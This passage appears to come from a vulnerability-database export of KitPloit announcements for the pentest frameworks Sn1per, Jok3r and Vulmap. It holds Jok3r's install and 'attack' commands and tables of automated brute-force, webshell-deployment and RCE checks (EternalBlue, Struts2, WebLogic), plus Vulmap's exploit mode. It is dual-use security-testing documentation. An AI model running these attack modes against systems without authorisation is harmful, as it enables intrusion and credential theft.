"impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": 
"http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:17:44", "description": "[](<https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s1600/jok3r_1_logo.png>)\n\n \n_Jok3r_ is a Python3 CLI application which is aimed at **helping penetration testers for network infrastructure and web black-box security tests**. \nIts main goal is to **save time on everything that can be automated during a network/web pentest in order to enjoy more time on more interesting and challenging stuff**. \nTo achieve that, it **combines open-source hacking tools to run various security checks against all common network services.** \n \n**Main features** \n**Toolbox management**: \n\n\n * Install automatically all the hacking tools used by _Jok3r_,\n * Keep the toolbox up-to-date,\n * Easily add new tools.\n**Attack automation**: \n\n\n * Target most common network services (including web),\n * Run security checks by chaining hacking tools, following a standard process (Reconnaissance, Vulnerability scanning, Exploitation, Account bruteforce, (Basic) Post-exploitation),\n * Let _Jok3r_ automatically choose the checks to run according to the context and knowledge about the target.\n**Mission management / Local database**: \n\n\n * Organize targets by missions in a local database,\n * Fully manage missions and targets (hosts/services) via an interactive shell (like msfconsole db),\n * Access results from security checks.\n_Jok3r_ has been built with the ambition to be easily and quickly customizable: tools, security checks, supported network services... can be easily added/edited/removed by editing settings files with an easy-to-understand syntax. 
\n \n**Installation** \n**The recommended way to use Jok3r is inside a Docker container, so you will not have to worry about dependency issues or installing the various hacking tools of the toolbox.** \n \nA Docker image is available on Docker Hub and automatically re-built at each update: <https://hub.docker.com/r/koutto/jok3r/>. It is based on the official Kali Linux Docker image (kalilinux/kali-linux-docker). \n \n**Pull Jok3r Docker Image:** \n\n \n \n sudo docker pull koutto/jok3r\n\n**Run fresh Docker container:** \n\n \n \n sudo docker run -i -t --name jok3r-container -w /root/jok3r --net=host koutto/jok3r\n\n**Important: the --net=host option is required to share the host's network interfaces. It is needed for reverse connections (e.g. a ping back to the container when testing for RCE, or catching a reverse shell).** \nJok3r and its toolbox are ready to use! \n\n\n * To re-run a stopped container:\n \n \n sudo docker start -i jok3r-container\n\n * To open multiple shells inside the container:\n \n \n sudo docker exec -it jok3r-container bash\n\nFor information about building your own Docker image or installing _Jok3r_ on your system without using Docker, refer to <https://jok3r.readthedocs.io/en/latest/installation.html> \n \n**Quick usage examples** \n**Show all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --show-all\n\n**Install all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --install-all --fast\n\n**Update all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --update-all --fast\n\n**List supported services** \n\n \n \n python3 jok3r.py info --services\n\n**Show security checks for HTTP** \n\n \n \n python3 jok3r.py info --checks http\n\n**Create a new mission in the local database** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n 
\n jok3rdb[MayhemProject]>\n\n**Run security checks against a URL and add results to the mission** \n\n \n \n python3 jok3r.py attack -t https://www.example.com/webapp/ --add MayhemProject\n\n**Run security checks against a MSSQL service (without user interaction) and add results to the mission** \n\n \n \n python3 jok3r.py attack -t 192.168.1.42:1433 -s mssql --add MayhemProject --fast\n\n**Import hosts/services from Nmap results into the mission scope** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission MayhemProject\n \n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]> nmap results.xml\n\n**Run security checks against all services in the given mission and store results in the database** \n\n \n \n python3 jok3r.py attack -m MayhemProject --fast\n\n**Run security checks against only FTP services running on ports 21/tcp and 2121/tcp from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=21,2121;service=ftp\" --fast\n\n**Run security checks against only FTP services running on port 2121/tcp and all HTTP services on 192.168.1.42 from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=2121;service=ftp\" -f \"ip=192.168.1.42;service=http\"\n\n \n**Typical usage example** \nYou begin a pentest with several servers in the scope. Here is a typical example of how _Jok3r_ is used: \n\n\n 1. You run an _Nmap_ scan on the servers in the scope.\n 2. You create a new mission (let's say \"MayhemProject\") in the local database:\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n 3. You import your results from the _Nmap_ scan into the database:\n \n \n jok3rdb[MayhemProject]> nmap results.xml\n\n 4. 
You can then get a quick overview of all services and hosts in the scope, add comments, add credentials if you already have some knowledge about the targets (grey-box pentest), and so on:\n \n \n jok3rdb[MayhemProject]> hosts\n \n [...]\n \n jok3rdb[MayhemProject]> services\n \n [...]\n\n 5. Now you can run security checks against some targets in the scope. For example, to run checks against all Java-RMI services in the scope, run the following command:\n \n \n python3 jok3r.py attack -m MayhemProject -f \"service=java-rmi\" --fast\n\n 6. You can view the results from the security checks either live while the tools are executed, or later from the database using the following command:\n \n \n jok3rdb[MayhemProject]> results\n\n \n**Full Documentation** \nDocumentation is available at: <https://jok3r.readthedocs.io/> \n \n**Supported Services & Security Checks** \n**Lots of checks remain to be implemented and services must be added !! 
Work in progress ...** \n\n\n * [AJP (default 8009/tcp)](<https://github.com/koutto/jok3r#ajp-default-8009-tcp>)\n * [FTP (default 21/tcp)](<https://github.com/koutto/jok3r#ftp-default-21-tcp>)\n * [HTTP (default 80/tcp)](<https://github.com/koutto/jok3r#http-default-80-tcp>)\n * [Java-RMI (default 1099/tcp)](<https://github.com/koutto/jok3r#java-rmi-default-1099-tcp>)\n * [JDWP (default 9000/tcp)](<https://github.com/koutto/jok3r#jdwp-default-9000-tcp>)\n * [MSSQL (default 1433/tcp)](<https://github.com/koutto/jok3r#mssql-default-1433-tcp>)\n * [MySQL (default 3306/tcp)](<https://github.com/koutto/jok3r#mysql-default-3306-tcp>)\n * [Oracle (default 1521/tcp)](<https://github.com/koutto/jok3r#oracle-default-1521-tcp>)\n * [PostgreSQL (default 5432/tcp)](<https://github.com/koutto/jok3r#postgresql-default-5432-tcp>)\n * [RDP (default 3389/tcp)](<https://github.com/koutto/jok3r#rdp-default-3389-tcp>)\n * [SMB (default 445/tcp)](<https://github.com/koutto/jok3r#smb-default-445-tcp>)\n * [SMTP (default 25/tcp)](<https://github.com/koutto/jok3r#smtp-default-25-tcp>)\n * [SNMP (default 161/udp)](<https://github.com/koutto/jok3r#snmp-default-161-udp>)\n * [SSH (default 22/tcp)](<https://github.com/koutto/jok3r#ssh-default-22-tcp>)\n * [Telnet (default 23/tcp)](<https://github.com/koutto/jok3r#telnet-default-21-tcp>)\n * [VNC (default 5900/tcp)](<https://github.com/koutto/jok3r#vnc-default-5900-tcp>)\n\n \n\n\n**AJP (default 8009/tcp)** \n\n \n \n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap AJP scripts | nmap |\n | tomcat-version | recon | Fingerprint Tomcat version through AJP | 
ajpy |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | default-creds-tomcat | bruteforce | Check [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials>) for Tomcat Application Manager | ajpy |\n | deploy-webshell-tomcat | exploit | Deploy a webshell on Tomcat through AJP | ajpy |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**FTP (default 21/tcp)** \n\n \n \n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap FTP scripts | nmap |\n | nmap-vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) 
| vuln-databases |\n | ftpmap-scan | vulnscan | Identify FTP server soft/version and check for known vulns | ftpmap |\n | common-creds | bruteforce | Check common credentials on FTP server | patator |\n | bruteforce-creds | bruteforce | Bruteforce FTP accounts | patator |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**HTTP (default 80/tcp)** \n\n \n \n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | Name | Category | Description | Tool used |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | nmap-recon | recon | Recon using Nmap HTTP scripts | nmap |\n | load-balancing-detection | recon | HTTP load balancer detection | halberd |\n | waf-detection | recon | Identify and fingerprint WAF products protecting website | wafw00f |\n | tls-probing | recon | Identify the implementation in use by SSL/TLS servers (might allow server fingerprinting) | tls-prober |\n | fingerprinting-multi-whatweb | recon | Identify CMS, blogging platforms, JS libraries, Web servers | whatweb |\n | fingerprinting-app-server | recon | Fingerprint application server (JBoss, ColdFusion, Weblogic, Tomcat, Railo, Axis2, Glassfish) | clusterd |\n | fingerprinting-server-domino | recon | Fingerprint IBM/Lotus Domino server | domiowned |\n | fingerprinting-cms-wig | recon | Identify several CMS and other administrative applications | wig |\n | fingerprinting-cms-cmseek | recon | Detect CMS (130+ supported), detect version on Drupal, advanced scan on Wordpress/Joomla | cmseek |\n | fingerprinting-cms-fingerprinter | recon | Fingerprint precisely CMS versions (based on files 
checksums) | fingerprinter |\n | fingerprinting-cms-cmsexplorer | recon | Find plugins and themes (using bruteforce) installed in a CMS (Wordpress, Drupal, Joomla, Mambo) | cmsexplorer |\n | fingerprinting-drupal | recon | Fingerprint Drupal 7/8: users, nodes, default files, modules, themes enumeration | drupwn |\n | crawling-fast | recon | Crawl website quickly, analyze interesting files/directories | dirhunt |\n | crawling-fast2 | recon | Crawl website and extract URLs, files, intel & endpoints | photon |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ssl-check | vulnscan | Check for SSL/TLS configuration | testssl |\n | vulnscan-multi-nikto | vulnscan | Check for multiple web vulnerabilities/misconfigurations | nikto |\n | default-creds-web-multi | vulnscan | Check for default credentials on various web interfaces | changeme |\n | webdav-scan-davscan | vulnscan | Scan HTTP WebDAV | davscan |\n | webdav-scan-msf | vulnscan | Scan HTTP WebDAV | metasploit |\n | webdav-internal-ip-disclosure | vulnscan | Check for WebDAV internal IP disclosure | metasploit |\n | webdav-website-content | vulnscan | Detect webservers disclosing its content through WebDAV | metasploit |\n | http-put-check | vulnscan | Detect the support of dangerous HTTP PUT method | metasploit |\n | apache-optionsbleed-check | vulnscan | Test for the Optionsbleed bug in Apache httpd (CVE-2017-9798) | optionsbleed |\n | shellshock-scan | vulnscan | Detect if web server is vulnerable to Shellshock (CVE-2014-6271) | shocker |\n | iis-shortname-scan | vulnscan | Scan for IIS short filename (8.3) disclosure vulnerability | iis-shortname-scanner |\n | iis-internal-ip-disclosure | vulnscan | Check for IIS internal IP disclosure | metasploit |\n | tomcat-user-enum | vulnscan | Enumerate users on Tomcat 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18 | metasploit |\n | jboss-vulnscan-multi | vulnscan | Scan 
JBoss application server for multiple vulnerabilities | metasploit |\n | jboss-status-infoleak | vulnscan | Queries JBoss status servlet to collect [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information>) (JBoss 4.0, 4.2.2 and 4.2.3) | metasploit |\n | jenkins-infoleak | vulnscan | Enumerate a remote Jenkins-CI installation in an unauthenticated manner | metasploit |\n | cms-multi-vulnscan-cmsmap | vulnscan | Check for vulnerabilities in CMS Wordpress, Drupal, Joomla | cmsmap |\n | wordpress-vulscan | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpscan |\n | wordpress-vulscan2 | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpseku |\n | joomla-vulnscan | vulnscan | Scan for vulnerabilities in CMS Joomla | joomscan |\n | joomla-vulnscan2 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlascan |\n | joomla-vulnscan3 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlavs |\n | drupal-vulnscan | vulnscan | Scan for vulnerabilities in CMS Drupal | droopescan |\n | magento-vulnscan | vulnscan | Check for misconfigurations in CMS Magento | magescan |\n | silverstripe-vulnscan | vulnscan | Scan for vulnerabilities in CMS Silverstripe | droopescan |\n | vbulletin-vulnscan | vulnscan | Scan for vulnerabilities in CMS vBulletin | vbscan |\n | liferay-vulnscan | vulnscan | Scan for vulnerabilities in CMS Liferay | liferayscan |\n | angularjs-csti-scan | vulnscan | Scan for AngularJS Client-Side Template Injection | angularjs-csti-scanner |\n | jboss-deploy-shell | exploit | Try to deploy shell on JBoss server (jmx|web|admin-console, JMXInvokerServlet) | jexboss |\n | struts2-rce-cve2017-5638 | exploit | Exploit Apache Struts2 Jakarta Multipart parser RCE (CVE-2017-5638) | jexboss |\n | struts2-rce-cve2017-9805 | exploit | Exploit Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | struts-pwn-cve2017-9805 |\n | struts2-rce-cve2018-11776 | exploit | Exploit Apache Struts2 
[misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration>) RCE (CVE-2018-11776) | struts-pwn-cve2018-11776 |\n | tomcat-rce-cve2017-12617 | exploit | Exploit for Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617) | exploit-tomcat-cve2017-12617 |\n | jenkins-cliport-deserialize | exploit | Exploit Java deserialization in Jenkins CLI port | jexboss |\n | weblogic-t3-deserialize-cve2015-4852 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2015-4852) | loubia |\n | weblogic-t3-deserialize-cve2017-3248 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2017-3248) | exploit-weblogic-cve2017-3248 |\n | weblogic-t3-deserialize-cve2018-2893 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2018-2893) | exploit-weblogic-cve2018-2893 |\n | weblogic-wls-wsat-cve2017-10271 | exploit | Exploit WLS-WSAT in Weblogic - CVE-2017-10271 | exploit-weblogic-cve2017-10271 |\n | drupal-cve-exploit | exploit | Check and exploit CVEs in CMS Drupal 7/8 (include Drupalgeddon2) (require user interaction) | drupwn |\n | bruteforce-domino | bruteforce | Bruteforce against IBM/Lotus Domino server | domiowned |\n | bruteforce-wordpress | bruteforce | Bruteforce Wordpress accounts | wpseku |\n | bruteforce-joomla | bruteforce | Bruteforce Joomla account | xbruteforcer |\n | bruteforce-drupal | bruteforce | Bruteforce Drupal account | xbruteforcer |\n | bruteforce-opencart | bruteforce | Bruteforce Opencart account | xbruteforcer |\n | bruteforce-magento | bruteforce | Bruteforce Magento account | xbruteforcer |\n | web-path-bruteforce-targeted | bruteforce | Bruteforce web paths when language is known (extensions adapted) (use raft wordlist) | dirsearch |\n | web-path-bruteforce-blind | bruteforce | Bruteforce web paths when language is unknown (use raft wordlist) | wfuzz |\n | web-path-bruteforce-opendoor | bruteforce | Bruteforce web paths using OWASP OpenDoor wordlist | wfuzz |\n | wordpress-shell-upload | postexploit | Upload shell 
on Wordpress if admin credentials are known | wpforce |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n\n**Java-RMI (default 1099/tcp)** \n\n \n \n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Attempt to dump all objects from Java-RMI service | nmap |\n | rmi-enum | recon | Enumerate RMI services | barmie |\n | jmx-info | recon | Get information about JMX and the MBean server | twiddle |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | jmx-bruteforce | bruteforce | Bruteforce creds to connect to JMX registry | jmxbf |\n | exploit-rmi-default-config | exploit | Exploit default config in RMI Registry to load classes from any remote URL (not working against JMX) | metasploit |\n | exploit-jmx-insecure-config | exploit | Exploit JMX insecure config. Auth disabled: should be vuln. Auth enabled: vuln if weak config | metasploit |\n | jmx-auth-disabled-deploy-class | exploit | Deploy malicious MBean on JMX service with auth disabled (alternative to msf module) | sjet |\n | tomcat-jmxrmi-deserialize | exploit | Exploit Java-RMI deserialize in Tomcat (CVE-2016-8735), req. 
JmxRemoteLifecycleListener | jexboss |\n | rmi-deserialize-all-payloads | exploit | Attempt to exploit Java deserialize against Java RMI Registry with all ysoserial payloads | ysoserial |\n | tomcat-jmxrmi-manager-creds | postexploit | Retrieve Manager creds on Tomcat JMX (req. auth disabled or creds known on JMX) | jmxploit |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**JDWP (default 9000/tcp)** \n\n \n \n +------------+----------+-----------------------------------------------------+-----------------+\n | Name | Category | Description | Tool used |\n +------------+----------+-----------------------------------------------------+-----------------+\n | nmap-recon | recon | Recon using Nmap JDWP scripts | nmap |\n | jdwp-rce | exploit | Gain RCE on JDWP service (show OS/Java info as PoC) | jdwp-shellifier |\n +------------+----------+-----------------------------------------------------+-----------------+\n\n[](<https://draft.blogger.com/null>) \n**MSSQL (default 1433/tcp)** \n\n \n \n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap MSSQL scripts | nmap |\n | mssqlinfo | recon | Get technical information about a remote MSSQL server (use TDS protocol and SQL browser Server) | msdat |\n | common-creds | bruteforce | Check common/default credentials on MSSQL server | msdat |\n | bruteforce-sa-account | bruteforce | Bruteforce MSSQL \"sa\" account | msdat |\n | audit-mssql-postauth | postexploit | Check permissive privileges, methods 
allowing command execution, weak accounts after authenticating on MSSQL | msdat |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**MySQL (default 3306/tcp)** \n\n \n \n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | Name | Category | Description | Tool used |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | nmap-recon | recon | Recon using Nmap MySQL scripts | nmap |\n | mysql-auth-bypass-cve2012-2122 | exploit | Exploit password bypass vulnerability in MySQL - CVE-2012-2122 | metasploit |\n | default-creds | bruteforce | Check default credentials on MySQL server | patator |\n | mysql-hashdump | postexploit | Retrieve usernames and password hashes from MySQL database (req. 
creds) | metasploit |\n | mysql-interesting-tables-columns | postexploit | Search for interesting tables and columns in database | jok3r-scripts |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n\n[](<https://draft.blogger.com/null>) \n**Oracle (default 1521/tcp)** \n\n \n \n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | tnscmd | recon | Connect to TNS Listener and issue commands Ping, Status, Version | odat |\n | tnspoisoning | vulnscan | Test if TNS Listener is vulnerable to TNS Poisoning (CVE-2012-1675) | odat |\n | common-creds | bruteforce | Check common/default credentials on Oracle server | odat |\n | bruteforce-creds | bruteforce | Bruteforce Oracle accounts (might block some accounts !) 
| odat |\n | audit-oracle-postauth | postexploit | Check for privesc vectors, config leading to command execution, weak accounts after authenticating on Oracle | odat |\n | search-columns-passwords | postexploit | Search for columns storing passwords in the database | odat |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**PostgreSQL (default 5432/tcp)** \n\n \n \n +---------------+------------+------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +---------------+------------+------------------------------------------------+-----------+\n | default-creds | bruteforce | Check default credentials on PostgreSQL server | patator |\n +---------------+------------+------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**RDP (default 3389/tcp)** \n\n \n \n +----------+----------+-----------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +----------+----------+-----------------------------------------------------------------------+------------+\n | ms12-020 | vulnscan | Check for MS12-020 RCE vulnerability (any Windows before 13 Mar 2012) | metasploit |\n +---------+----------+-----------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMB (default 445/tcp)** \n\n \n \n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | nmap-recon | recon | Recon using Nmap SMB scripts | nmap 
|\n | anonymous-enum-smb | recon | Attempt to perform enum (users, shares...) without account | nullinux |\n | nmap-vulnscan | vulnscan | Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap | nmap |\n | detect-ms17-010 | vulnscan | Detect MS17-010 SMB RCE | metasploit |\n | samba-rce-cve2015-0240 | vulnscan | Detect RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X | metasploit |\n | exploit-rce-ms08-067 | exploit | Exploit for RCE vuln MS08-067 on SMB | metasploit |\n | exploit-rce-ms17-010-eternalblue | exploit | Exploit for RCE vuln MS17-010 EternalBlue on SMB | metasploit |\n | exploit-sambacry-rce-cve2017-7494 | exploit | Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494) | metasploit |\n | auth-enum-smb | postexploit | Authenticated enumeration (users, groups, shares) on SMB | nullinux |\n | auth-shares-perm | postexploit | Get R/W permissions on SMB shares | smbmap |\n | smb-exec | postexploit | Attempt to get a remote shell (psexec-like, requires Administrator creds) | impacket |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMTP (default 25/tcp)** \n\n \n \n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | smtp-cve | vulnscan | Scan for vulnerabilities (CVE-2010-4344, CVE-2011-1720, CVE-2011-1764, open-relay) on SMTP | nmap |\n | smtp-user-enum | vulnscan | Attempt to perform user enumeration via SMTP commands EXPN, VRFY and RCPT TO | smtp-user-enum |\n 
+----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n\n**SNMP (default 161/udp)** \n\n \n \n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | common-community-strings | bruteforce | Check common community strings on SNMP server | metasploit |\n | snmpv3-bruteforce-creds | bruteforce | Bruteforce SNMPv3 credentials | snmpwn |\n | enumerate-info | postexploit | Enumerate information provided by SNMP (and check for write access) | snmp-check |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n\n**SSH (default 22/tcp)** \n\n \n \n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | vulns-algos-scan | vulnscan | Scan supported algorithms and security info on SSH server | ssh-audit |\n | user-enumeration-timing-attack | exploit | Try the OpenSSH user enumeration timing attack (OpenSSH versions >= 5.x and <= 7.2) | osueta |\n | default-ssh-key | bruteforce | Try to authenticate on SSH server using known SSH keys | changeme |\n | default-creds | bruteforce | Check default credentials on SSH | patator |\n 
+--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n\n**Telnet (default 23/tcp)** \n\n \n \n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap Telnet scripts | nmap |\n | default-creds | bruteforce | Check default credentials on Telnet (dictionary from https://cirt.net/passwords) | patator |\n | bruteforce-root-account | bruteforce | Bruteforce \"root\" account on Telnet | patator |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n\n**VNC (default 5900/tcp)** \n\n \n \n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap VNC scripts | nmap |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) 
| vuln-databases |\n | bruteforce-pass | bruteforce | Bruteforce VNC password | patator |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n \n \n\n\n**[Download Jok3R](<https://github.com/koutto/jok3r>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-01-23T12:25:00", "type": "kitploit", "title": "Jok3R - Network And Web Pentest Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4344", "CVE-2011-1720", "CVE-2011-1764", "CVE-2012-1675", "CVE-2012-2122", "CVE-2014-6271", "CVE-2015-0240", "CVE-2015-4852", "CVE-2016-8735", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-3248", "CVE-2017-5638", "CVE-2017-7494", "CVE-2017-9798", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-2893"], "modified": "2019-01-23T12:25:12", "id": "KITPLOIT:5052987141331551837", "href": "http://www.kitploit.com/2019/01/jok3r-network-and-web-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-22T06:42:40", "description": 
"[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in web containers, web servers, web middleware, CMSs and other web applications, and it also has exploitation functions. Testers can use Vulmap to detect whether a target has a specific vulnerability, and then use the exploitation function to verify that the vulnerability actually exists.\n\nVulmap currently has a vulnerability scanning (poc) mode and an exploiting (exp) mode. Use \"-m\" to select the mode; poc is the default. In poc mode it also supports batch target scanning with \"-f\", writing results to a file with \"-o\" and other options (see [Options](<https://github.com/zhzyker/vulmap/#options>) or python3 vulmap.py -h). In exp mode the poc check is not run first: the exploit is carried out directly and its result is reported, which both verifies that the vulnerability exists and shows whether it can be exploited.\n\n**Use \"-a\" to restrict the scan to a target type, which reduces false positives, e.g. \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3; python3.7 or higher is recommended\n\n * Install dependencies\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, one URL per line (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\"; you can omit this option, and poc mode is used by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). 
